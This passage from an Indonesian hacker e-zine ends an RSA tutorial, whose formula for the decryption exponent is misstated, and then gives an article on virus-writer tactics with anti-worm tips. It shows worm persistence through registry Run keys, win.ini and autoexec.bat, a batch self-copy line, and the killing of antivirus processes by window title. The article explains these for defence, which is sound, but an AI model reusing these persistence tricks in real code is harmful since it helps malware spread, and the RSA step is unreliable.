eksponen decryption.


----| Encrypting Message

Misalkan Bob ingin mengirim sebuah pesan 'H' kepada Alice.

a. Alice harus membuat keynya; sehingga ia memiliki private dan
public keys.

private key = (M,d)
public key = (M,e)

b. Mengubah 'H' menjadi sebuah bilangan yang menggunakan alphabet
yang valid dengan tabel bilangan. Sebuah contoh mudah adalah
mapping A = 1, B = 2 ... Z = 26.

sehingga H = 8

c. C = 8^e (mod M)
C adalah sebuah bilangan ter-encrypt.

d. Bob mengirimkan bilangan tersebut kepada Alice sehingga Alice
dapat melakukan decode ulang menggunakan private keynya.


------| Decrypting Message

Misalkan Alice menerima sebuah pesan ter-encrypt, ia akan men-decrypt-nya
menggunakan tahapan-tahapan berikut:

a. Alice mempunyai private key dari langkah-langkah di atas (M,d)

b. N = C^d (mod M)

c. N adalah bilangan. Gunakan konversi table alphabet untuk mengubah
N menjadi karakter yang direpresentasikannya.


----| Example

a. Generate Key (kita dapat melewati langkah ini untuk menemukan p dan q)

1. M = 101 , sebuah bilangan prima --> phi(M) = 100

2) a] Misalkan e = 13
b] Cari d (e*d) mod M = 1
Gunakan persamaan (a*x) mod M = 1
d = 77

b. Kata "HELLO" digunakan sebagai pesan, dan diubah menurut numerical
representation-nya.

HELLO = 08 05 12 12 15

c. Encoding pesan.

8^13 mod 101 = 18
5^13 mod 101 = 56
12^13 mod 101 = 53
15^13 mod 101 = 7

Sehingga pesan ter-encrypt atau ciphertext adalah 18,56,53,53,07.

d. Decoding pesan.

18^77 mod 101 = x1
56^77 mod 101 = x2
53^77 mod 101 = x3 = x4
07^77 mod 101 = x5


------| Closure

RSA merupakan contoh yang powerful dan cukup aman dari Public-Key
Cryptography. Berdasarkan matematika, proses yang digunakan berdasarkan
fungsi-fungsi trap-door satu arah. Sehingga melakukan encryption
dengan menggunakan public key sangat mudah bagi semua orang, namun proses
decryption menjadi sangat sulit.

Proses decryption sengaja dibuat sulit agar seseorang, walaupun menggunakan
Cray supercomputers dan ribuan tahun, tidak dapat men-decrypt pesan tanpa
mempunyai private key.

Perlu diingat juga bahwa pemilihan p*q = M haruslah sebuah bilangan yang
sangat besar sehingga sulit dicari eksponen decoding-nya karena sulit
melakukan pemfaktoran bilangan prima.


------| Reference

[1] Childs, Lindsay N. A Concrete Introduction to Higher Algebra.
Undergraduate Texts in Mathematics. Springer-Verlaag: New York,
2000.

[2] Schneier, B. Applied Cryptography, 2nd Ed. John Wiley & Sons, Inc:
Canada, 1996.

[3] Rivest R.L., Shamir A., Adleman L. "A Method for Obtaining Digital
Signatures and Public-Key Cryptosystems. MIT: Massachusetts. 1977.


|---- EOF ----------------------------------------------------------------|

Psikologi Penulis Virus



Pada dasarnya saya akan memberi sedikit penjelasan kepada anda tentang:

>> Sudut pandang seorang pembuat virus (biasa juga disebut VM/VX).Virus
disini kita fokuskan pada worm.
>> Bagaimana seekor worm dapat menyebar luas.
>> Kelalaian korban.
>> Memanfaatkan kebiasaan VX untuk mengantisipasi serangan worm karena
kelalaian user (Tips aman dari virus tanpa Antivirus).

Selamat menikmati..


---// Sudut Pandang Seorang VX dan bagaimana seekor worm dapat
menyebar-luas dengan memanfaatkan kelalaian user.

Mari sejenak kita masuk kedalam sudut pandang seorang Virus Writer(VX).
Pada intinya, seorang VX akan memposisikan dirinya seakan-akan dirinya
adalah sang korban. VX biasanya akan memfokuskan perhatian pada hal-hal
berikut:

:1):: Registry.
:2):: Ms Configuration Untility.
:3):: File Autoexec.bat dan win.ini.
:4):: Task Manager.
:5):: Special Directory.
:6):: Kloning dan Icon.
:7):: Media penyebaran.
[+] Disket
[+] Flashdisk
[+] E-mail
[+] IRC
[+] Web page
:8):: System Restore.
:9):: Pertahanan diri terhadap Worm Removal Tools, Antivirus serta
aplikasi-aplikasi lain yang (dianggap) membahayakan kelangsungan
hidup worm.

Nah, sekarang mari kita kupas satu-persatu poin-poin diatas lalu kita
nikmati bersama-sama hehehe.. :P


:1)::------------:: Registry (Start --> Run --> ketik regedit).

Registry boleh dikatakan sebagai kunci utama dan hal yang akan sangat -
sangat diperhatikan oleh user dalam pembasmian worm. Registry adalah
serangkaian konfigurasi yang dipakai windows untuk mengontrol hardware
dan software yang ter-instal pada PC. Registry dibentuk oleh dua file,
yaitu system.dat dan user.dat yang berada di direktori windows. Dua file
ini memiliki file backup yang bernama system.da0 dan user.da0.

Ada lima key utama (Handle Key) pada registry.

1. HKEY_CLASSES_ROOT (subkey dari HKEY_LOCAL_MACHINE\Software\Classes)
.::Tempat menyimpan informasi yang akan memastikan bahwa files yang anda
buka dibuka dengan aplikasi yang benar.

2. HKEY_CURRENT_USER (Subkey dari HKEY_USERS)
.::Mengandung beragam informasi tentang user (pengguna yang sedang
menggunakan Pc). Bukan cuma profil aja, tapi semua settingan kompy
masing-masing user ada disini.

3. HKEY_LOCAL_MACHINE
.::Mengandung informasi tentang setting windows secara keseluruhan bagi
seluruh pengguna PC. Setting yang dimaksud disini meliputi hardware
dan software.

4. HKEY_USERS
.::Udah jelas khan dari namanya... Yup, isi dari handle key yang satu ini
adalah data dari seluruh pengguna PC.

5. HKEY_CURRENT_CONFIG
.::Berisi info tentang profil hardware yang digunakan PC saat komputer
menyala.

Hampir seluruh aksi yang dilakukan oleh worm tidak lepas dari seputar
memodifikasi registry. Dari registry jugalah worm biasanya di set agar
otomatis hidup tatkala komputer menyala. Hal tersebut dapat dilakukan
dengan menambahkan string Value pada lokasi berikut:

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run

Dari registry pula sang pembuat worm biasa mendisable fasilitas-fasilitas
penting seperti diantaranya MS Dos, Task Manager (MSCONFIG.EXE), Registry
Editor(Regedit.exe), merubah Registered Owner dan Registered Organization,
serta beragam aksi menyebalkan lainnya.

Karena itulah sang VX berusaha untuk mendisable Registry Editor agar worm
buatannya tidak bisa dihentikan dengan mudah.


:2)::--------:: MsConfigurationUntility (Start-->Run-->ketik MSCONFIG).

Dari MSCONFIG user biasa memeriksa file/aplikasi apa saja yang dijalankan
otomatis ketika windows startup. Banyak hal bisa dilakkan dengan Ms
Configuration Untility. Dari MSCONFIG user bisa menghapus daftar aplikasi
yang tidak diinginkan. Dari sini pula user bisa dengan leluasa mengedit
isi file win.ini, autoexec.bat, system.ini dan config.sys. Oleh karena
itulah VX berusaha mencegah user untuk mengakses MSCONFIG demi kelangsungan
hidup ciptaannya.

Perlu anda ketahui bahwa pada windows 2000 Microsoft tidak menyertakan
file msconfig.exe. Mungkin waktu itu para pengembangnya lagi ngantuk kali
yee.. sehingga kelupaan menyertakan file penting ini hehehe... *kidding*


:3)::--------:: File Autoexec.bat dan win.ini

Apa yang special dari kedua file diatas? Ya,dengan sedikit memanipulasi
isi kedua file tersebut seorang VX bisa membuat Virusnya otomatis
berjalan ketika windows booting. Kedua file diatas akan di proses ketika
startup. Ah, yang bener? Mosok seeh?? Duuh.. gak percaya yach.. ok dech..
jaman sekarang ini segalanya membutuhkan pembuktian. Jika anda pengguna
windows 98, coba anda buka file Autoexec.bat yang terletak di C:\ kemudian
periksa atributnya dulu, jika beratribut read-only, maka hilangkan centang
pada atribut itu agar anda bisa melakukan modifikasi isi file. Setelah itu
klik kanan pada file dan pilih Edit. Jendela Notepad akan terbuka dan
menampilkan isi file Autoexec.bat. Ketik script berikut:

@echo off
echo.
echo Selamat datang di komputer Gue..
echo Biar jelek begini, yang penting gw pake uang halal..
echo.
echo Sekarang tekan sembarang tombol..
echo ----------------------------------------------------
pause

Klik [file]-->[save] untuk menyimpannya. Tutup Notepad kemudian restart
komputer anda. Maka ketika windows booting pesan anda akan tampil.

Kini kita beralih ke file win.ini. File Win.ini terletak di directory
Windows berisi beberapa konfigurasi yang mengatur OS anda. Anda bisa
menjalankan file tertentu secara otomatis dengan memodifikasi isi file
win.ini. Untuk mempermudah pemahaman anda, coba tambahkan baris berikut:

[Windows]
load=c:\lokasi_program\nama_program_yang_anda_ingi nkan.exe
run=c:\lokasi_program\nama_program_yang_anda_ingin kan.exe

Ada beberapa file lagi yang juga sama-sama diproses ketika windows
startup yaitu winstart.bat, system.ini dan config.sys namun virus kerap
kali memilih kedua file "special" yang telah saya bahas diatas.


:4)::--------:: Task Manager (Tekan CTRL + ALT + DEL secara bersamaan).

Sesuai dengan namanya, Task Manager akan menampilkan aplikasi apa saja
yang sedang berjalan baik yang secara background atau tidak. Melalui Task
Manager kita bisa menghentikan "secara paksa" program yang tidak kita
inginkan. Sang VX menyadari benar akan hal ini, dan banyak sekali worm
yang diprogram untuk mampu mendisable Task Manager. Metodanya sendiri
bermacam-macam. Ada yang otomatis mematikan fungsi mouse ketika Task
Manager tebuka, ada pula yang langsung melakukan shutdown atau restart.
Diantaranya yang paling sering dilakukan adalah dengan perintah Taskkill,
namun cara ini tergolong kurang efektif karena perintah taskkill tidak
berjalan pada windows 9x dan ME.


:5)::-------:: Special Directory.

Ada 2 directory special yang sudah menjadi "langganan" worm dan Virus
yaitu directory windows dan directory system. Kedua directory ini memiliki
keunikan tersendiri karena kemudahan pengesetan variabel ketika kita menulis
kode program. Saya beri contoh sederhana dalam batch programming (duuh..
dari tadi sederhana melulu.. :P mudah-mudahan anda gak bosan yach..).
Misalnya anda ingin agar Virus anda mengcopykan dirinya sendiri ke directory
windows dan directory system maka script untuk melakukan aksi copy yang
kita ketikkan ialah:

Copy %0 %windir%\virus.bat
Copy %0 %sysdir%\virus.bat

Karakter %0 berarti memerintahkan program tersebut untuk membaca dirinya
sendiri dan %windir% serta %sysdir% sudah merupakan variabel default untuk
menunjukkan directory windows dan system. Eh, mengapa scriptnya gak seperti
ini saja:

Copy %0 C:\windows\virus.bat
Copy %0 C:\windows\system\virus.bat.

Hayoo.. kalau pake perintah diatas khan sama saja?? Tidak!! Jawabannya
Tidak Sama pada kasus tertentu. Perlu anda ketahui bahwa tidak selamanya
directory Windows benama Windows, dan tidak selamanya pula directory
System bernama System. Untuk lebih jelasnya perhatikan tabel berikut:

-------------------------------------------------------------------
| Versi Windows | Nama Directory Windows | Nama Directory System |
|-----------------------------------------------------------------|
| Windows 9x, me | windows | system |
| windows 2000 | winnt | system32 |
| windows XP | windows | system32 |
-------------------------------------------------------------------


:6)::-------:: Kloning dan Icon.

Dengan kemampuan kloning dan penggunaan icon yang "tepat" seekor worm
akan menyebar dengan sukses. Akhir-akhir ini banyak worm menggunakan
icon HTML Document, Microsoft Word Document dan icon Folder untuk me-
ngecoh user. Dan ternyata?? Banyak sekali para pengguna komputer yang
tertipu mentah-mentah! Hal ini dibuktikan dengan maraknya penyebaran
worm yang sangat meluas!! Tidak sadarkah anda bahwa penyebaran worm
yang bombastis ini tidak lain dan tidak bukan karena kecerobohan anda
sendiri?? Hehehe.. jadi kalo anda ingin mengetahui seberapa ceroboh user
di negara kita ini, tinggal kita pantau saja dari banyak tidaknya orang
yang terserang worm :P

Sebelum anda membuka dokumen apapun, pastikan dengan benar bahwa icon yang
digunakan SESUAI sengan ekstensi file yang seharusnya. Banyak user yang
lalai akan hal ini. Biasakan untuk melihat properties file terlebih
dahulu sebelum membukanya. Worm belakangan ini "gemar" memakai icon folder
dan msword namun memiliki ekstensi *.scr dan *.exe padahal kita tau bahwa
folder tidak memiliki ekstensi dan ekstensi untuk file microsoft word
adalah *.doc Ingat!! Jangan terkecoh!! waspadalah!! waspadalah!! :P


:7)::-------:: Media penyebaran.

[+]Disket dan Flashdisk
--------------------
Tentu saja hal ini merupakan tahap yang tak kalah pentingnya. VX akan
memilih sasaran media penyipanan yang sering digunakan oleh user. Misalnya
dulu mungkin orang hanya menggunakan disket, namun seiring berkembangnya
teknologi, penggunaan FlashDisk semakin meluas. Dan bisa ditebak, banyak
pula worm kini yang mampu menggandakan dirinya kedalam FlashDisk.

[+]Email
-----
Email juga sangat-sangat potensial dalam penyebaran worm. Di zaman yang
serba-E ini email sekan menjadi kebutuhan pokok. Banyak sekali worm yang
memiliki SMTP sendiri untuk menyebarkan dirinya. Biasanya email seperti ini
memiliki subject yang menarik, serta isi yang menggoda user untuk membuka
attachment Virus yang disertakan.

Worm akan memeriksa address book yang ada di aplikasi mail komputer korban
kemudian mencatat seluruh daftar alamat email yang ada disana. Adakalanya
worm hanya memilih alamat email tertentu saja (secara acak) namun terkadang
juga melakukan pengiriman diri sendiri kepada seluruh alamat yang ditemukan.

[+]IRC
----
IRC sejak lama telah dimanfaatkan oleh VX dalam penyebaran worm. Biasanya
worm akan memodifikasi isi file mirc.ini sehingga nantinya worm akan aktif
di beberapa channel yang ditentukan untuk berfungsi selayaknya boot.

[+]Website
-------
Yang terakhir ini nampaknya kian marak kita temui, yaitu penyebaran melalui
web page. Biasanya admin situs yang menjadi seorang VX akan menyisipkan kode
javascript yang akan menjalankan file virus secara otomatis tanpa disadari
oleh korban (pengunjung). Admin-admin "durjana" (semoga Tuhan mengampuni
dosa-dosa mereka.. ^_^ .. ) seperti ini biasanya mengelola situs yang
"menarik" seperti penyedia crack, serial number, hacker tools dan situs-
situs p0rn0.

Selain menyisipkan kode Javascript, para admin nakal tersebut juga sering
melakukan aksi penipuan dengan menyisipkan worm pada file-file yang sering
di download oleh user.


:8)::-------:: System Restore

Dulu kemampuan System Restore inilah yang dibangga-banggakan oleh Micro$oft.
Ketika Windows mengalami Error entah karena file systemnya corrupt, maka
kita tinggal menggunakan System restore, kembali kepada restore point saat
komputer kita masih dalam keadaan baik-baik saja.

Saya memiliki sedikit pengalaman dengan Virus Brontok.C. Virus ini sangat
merepotkan karena sepertinya sang penulisnya telah memikirkan matang-
matang tentang hal-hal yang memungkinkan mempersingkat umur Worm buatannya.

Saat itu (5/04/2006) saya dipanggil ke rumah seorang teman di Surabaya.
Sebelumnya saya sudah membaca "bocoran" tentang Virus ini di www.vaksin.com.
Vaksin memang memberikan solusi, namun solusi itu terlalu rumit dan saya
tidak punya tools yang disarankan oleh vaksin sebagai alat bantu.

Saya berusaha membasminya secara manual dan mencari-cari cara untuk mem-
bantai worm ini. Saya sempat hampir menyerah sebelum pada akhirnya saya
teringat sesuatu.. yaitu system restore. Beruntung sekali Brontok tidak
mengincar System Restore sehingga saya bisa menjalankan System Restore
tanpa masalah. Setelah System Restore terbuka, segera saya pilih Restore
point saat komputer belum terinfeksi. Dan Sukses!! hehehe.. brontok musnah
dalam sekejap!! Tinggal bersih-bersih "mayatnya" ajah.... :P


:9)::-------:: Pertahanan diri terhadap aplikasi pembasmi worm dan aplikasi
lain yang membahayakan.

Aplikasi yang membahayakan disini adalah yang membahakan bagi kelangsungan
hidup sang virus. VX jelas mempertibangkan hal ini. Meskipun semua fasilitas
default seperti msconfig, regedit, taskmanager, msdos sudah dikunci, namun
di internet banyak sekali tools serupa yang dibuat oleh pihak ketiga.

Naah, user biasa menggunakan tools serupa ini untuk membasmi virus secara
manual. VX kini memiliki kebiasaan memprogram wormnya untuk bisa mendeteksi
Application Title dari program yang sedang berjalan. Biasanya ketika me-
nemukan Application title yang tidak diinginkan seperti mengandung kata
"Antivirus" , "Removal" , "Anti" , "Regsitry Editor" , "Untility" , "Basmi",
"Prompt" maka virus akan menghentikan proses program tersebut.

Oleh karena itulah jika anda berniat membuat suatu removal tools untuk worm
jenis tertentu, jangan gunakan Application Title yang kira-kira sudah
diperhitungkan oleh sang VX.


---// Memanfaatkan kebiasaan VX untuk mengantisipasi serangan worm karena
kelalaian user (Tips aman dari virus tanpa Antivirus).

1. Waspadai file-file asing

- Pastikan bahwa antara ekstensi file dan logo icon file yang ditampilkan
sesuai. Beberapa virus meniru icon msword dan icon file-file gambar
untuk mengelabuhi user. Bahkan ada yang meniru icon Folder seperti virus
w32/kumis.A dan Brontok misalnya.

- Jangan membuka file-file asing yang tidak kamu ketahui secara jelas asal
usulnya dan dampak bagi komputermu.
- Jangan membuka folder yang dirasa asing. Pastikan apakah folder asing
itu benar-benar folder ataukah file *.exe dan *.scr yang memakai icon
folder.

- Hati-hati terhadap file-file .vbs dan .bat yang terenkripsi. Sebelum
menjalankannya sebaiknya decrypt dulu codenya, itu jika anda mau (dan
mampu)

- Waspada terhadap file-file web seperti html, htm, php, asp dll..
Sebelum kamu membuka file-file tersebut yang kamu dapat dari Internet,
terlebih dahulu bukalah file-file tersebut dengan menggunakan notepad.
Setelah dirasa aman dari script asing, barulah buka dengan browser.


2. Periksa dan lindungi file-file system.

File-file .ini dan Autoexec.bat adalah sasaran empuk bagi virus. Kamu
bisa melindungi file-file tersebut dari perubahan dengan menggunakan aplikasi
pengaman komputer seperti FileVault (bisa kamu dapatkan di www.spyrozone.tk).
Filevault disamping mengamankan data-data pentingmu juga akan mengamankan
file-file system (idiih.. ngiklan neeh yee... )


3. Disket, Flashdisk, CD (Media penyimpanan)

Dari hasil penelitian ternyata virus-virus yang paling meluas penyebaran-
nya adalah virus yang mampu menyebarkan dirinya melalui disket dan flash-
disk. Hal ini terjadi dikarenakan pada umumnya pengguna komputer di Indonesia
masih menggunakan disket sebagai alat penyimpanan data sementara. Jangan
langsung membuka disket dengan menggunakan Windows explorer!! Masuklah ke
A:\ melalui DOS terlebih dahulu kemudian hapuslah file Folder.htt (biasanya
beratribut Hidden). Mengapa harus menghapus folder.htt?? Karena file
folder.htt kerapkali menjadi sasaran virus untuk menyisipkan kode jahatnya.
Why?? Karena file ini akan otomatis tereksekusi saat kamu membuka suatu folder
atau drive (dikendalikan oleh file desktop.ini).

Dan yang perlu kamu ingat adalah, sebelum membuka file "APAPUN" dari
media-media penyimpanan diatas, lihat dulu properties filenya (klik-kanan
pada file kemudian pilih properties) perhatikan apakah File Type nya sama
dengan file yang kamu maksudkan dan sesuai dengan logo icon yang dipakai.
Biasanya worm akan memakai ekstensi *.exe (aplication) dan *.scr (scren
saver) dengan menggunakan icon yang menjebak. Icon yang sering disunakan
ialah icon-icon MsOffice (msword, excel, Msaccess, MsPowerPoint), notepad,
dan icon folder.

Ketika kamu menerima CD dari temanmu atau orang lain yang tidak kamu ketahui
secara pasti isinya, tekan tombol SHIFT sambil memasukkan CD kedalam CD Room
drive. Klik-kanan tombol start (sambil tetap menekan tombol shift) kemudian
pilih Explore. Jendela Windows Explorer akan terbuka lalu bukalah lokasi
CD yang ingin kamu buka. Setelah isi CD ditampilkan, barulah kamu boleh
melepas tombol SHIFT. Hal ini akan mematikan fungsi Autorun sebagai antisipasi
bila temanmu atau orang lain membuat CD jebakan yang memanfaatkan fungsi
Autorun.


4. Internet

- Jika kamu browsing di rumah, usahakan untuk tidak menggunakan Internet
Explorer. IE sangat lemah dan rentan terhadap serangan virus/worm. Gunakan
browser lain yang lebih handal misalnya Mozilla Firefox.

- Waspadalah terhadap screensaver gratisan yang banyak bertebaran di Internet
Beberapa screensaver juga sengaja dipasangi spyware oleh si pembuatnya.
Spyware adalah software mata-mata yang bisa mengirimkan laporan kegiatan
komputer satu (komputer korban) ke komputer lain (pemasang spyware).
Gunakan saja pembasmi spyware yang sudah banyak beredar di Internet.
Waspadai juga program-program crack karena kebanyakan aplikasi tersebut
disisipi trojan oleh pembuatnya.

- Jangan browsing ke sitis-situs PORNO. Disamping karena Dosa (Zina Mata)
kebanyakan situs-situs porno menyisipkan trojan berbahaya yang akan
mencuri informasi-informasi dari komputermu. Tapi jika kamu nekat juga
"pengen" browsing ke situs-situs "ahli Neraka" tersebut, installah
DeepFreeze terlebih dahulu dan aktifkan Frozen mode.

- Jangan menggunakan MS Outlook karena kamu tentunya sudah tau sendiri
betapa lemahnya MS OUTLOOK. GunakangudoraMail.


5. Task Manager, MsCONFIG, StartUp, Registry

- Komputer sering hang?? Periksalah Taskmanager (ctrl+alt+del) dan lihat-
lah aplikasi apa saja yang sedang berjalan, siapa tau ada "utusan"
Virus disana. Jika ada aplikas asing, lansung ajah EndTask.

- Periksa juga MsConfig (start --> Run ketik msconfig) pada tab startup.
Hilangkan centang pada aplikasi yang tidak penting. Jika ada aplikasi
yang asing, segera hilangkan centang di kotak sebelahnya lalu masuklah
ke registry (start --> Run ketik regedit) dan hapus valuenya.

- Direktory startup (start-programs-startup) juga harus sering-sering
diperiksa karena semua file yang ada di direktory ini akan otomatis
dijalankan saat windows startup. Jika ada file asing di directory ini,
segera hapus!!


6. Trust NOBODY!!

Jangan percaya pada siapapun!!! Jangan pernah memberikan akses setingkat
dengan Administrator pada orang lain. Ingat!! Bisa saja orang lain tersebut
menyisipkan aplikasi jahat di komputermu entah dengan alasan bercanda atau
alasan lainnya.

Bagaimana?? Keenam langkah diatas cukup merepotkan bukan?? Jika kamu tidak
mau repot, ada dua alternatif yang saya sarankan:

1. Install Antivirus handal yang tidak menguras memory. Namun ingat!!!!!
sekali lagi kamu harus INGAT!! bahwa perkembangan Antivirus jauh ter-
tinggal dengan perkembangan Worm dan Virus setiap harinya. Maka dari itu
kewaspadaan tetap nomor satu!! kalaupun kamu menginstall antivirus, maka
kamu wajib untuk melakukan updating secara rutin.

Ada anggapan KELIRU yang kini mendarah-daging di masyarakat kita yaitu:

"SAYA SUDAH MENGINSTALL ANTIVIRUS TERBARU, MAKA SAYA TELAH AMAN DARI
SERANGAN WORM, VIRUS DAN TROJAN"

Anggapan ini SALAH BESAR. Yang anda butuhkan bukan Antivirus terbaru,
namun antivirus yang memiliki VIRUS DEFINITION TERBARU.

2. Jangan Pernah Membuka File-File ASING yang Tidak Kamu Ketahu Secara
Jelas Asal-Usulnya. Titik!!

Kesannya memang sedikit paranoid, tapi.. yeah apa boleh buat, daripada
nantinya kita dibuat repot, terbuang waktu dan tenaga. Bagaimanapun juga
mencegah lebih baik daripada mengobati.


---// Penutup

Well, kini anda sudah mengetahui kebiasaan-kebiasaan dan pola pikir sang
VX. Saya juga telah memberi sedikit solusi kepada anda (walaupun solusi
yang saya berikan jauh dari sempurna) supaya anda terhindar dari serangan
worm. Maka kini giliran andalah untuk WASPADA.

"Let's make our life better, be your self,
break the rule and open your mind!!"
//-----------( Spyro )-----------//


---// Referensi

[+] Pengamatan terhadap berbagai aksi virus dan cara pembasmiannya di
http://www.vaksin.com


---// Greetz
- Vindika Anastasya(Sherry)
- Chiko Ardiansyah - Tirasya - Nophee - Dr.LoveX - VIPnet - PusHmoV -
MyztX - Para pengunjung setia www.spyrozone.tk - All Echoers
- All Echo Staf

Recent Posts

comments powered by Disqus